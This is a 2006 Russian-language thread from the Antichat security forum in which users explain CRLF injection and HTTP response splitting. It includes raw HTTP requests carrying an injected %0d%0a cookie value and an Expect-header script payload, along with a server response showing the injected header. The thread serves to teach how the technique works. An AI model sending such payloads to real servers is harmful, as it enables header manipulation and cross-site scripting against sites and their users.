Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   CRLF injection (https://forum.antichat.xyz/showthread.php?t=22968)

Electro 22.08.2006 11:32

CRLF injection
 
Кто нибудь может обяснить человеческим языком что это такое ?? CRLF injection
Описания на инглишь выгледит так но я не очень то понял что к чему :(
Я понял только то что типа стырания куков через XSS
Просто названия такое возбуждающее=)) :D CRLF injection

This script is possibly vulnerable to CRLF injection attacks.

HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.

+toxa+ 22.08.2006 12:13

Привет от blackybr:

http://www.acunetix.com/websitesecurity/crlf-injection.htm
http://www.securiteam.com/securityreviews/5WP022K75O.html

Electro 22.08.2006 12:21

Мда...еслиб знал Инглиш гуд то не обратился бы
Все равно спасибо )
А blackybr-а я незнаю ..)

k1b0rg 22.08.2006 12:21

GET /index.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (MSIE 6.0; Windows NT 5.0;)
Host: localhost
Cookie: PHPSESSID=%0d%0aLOL%3ALOL2
Connection: Close
Pragma: no-cache


вернет ответ сервера
HTTP/1.1 200 OK
Date:Tue, 22 Aug 2006 07:54:28 GMT
Server:Apache/1.3.33-Pool-060606.1 (Win32) PHP/4.3.11
X-Powered-By:PHP/4.3.11
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
LOL:LOL2
Pragma:no-cache
Content-Type:text/html
Connection:close

Electro 22.08.2006 12:35

Ну имхо щас уже ясно ...
это типа XSS на апаче

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
Host: http://localhost
Cookie: hotlog=1;path=/
Connection: Close
Expect: <script>alert(Electro)</script>
Pragma: no-cache

Разница получился в том что в CRLF injection идет манупуляция с куками

Все! Ясно! Всем спасибо за ответы
Тему можно закрыть

madnet 22.08.2006 13:16

>Разница получился в том что в CRLF injection идет манупуляция с куками
не обязательно с куками, суть атаки вообще в том, что при помощь CRLF, тоесть переноса каретки, можно нарушить заголовок.

Electro 22.08.2006 14:28

ага...ясно, спасибо большое!


Время: 18:10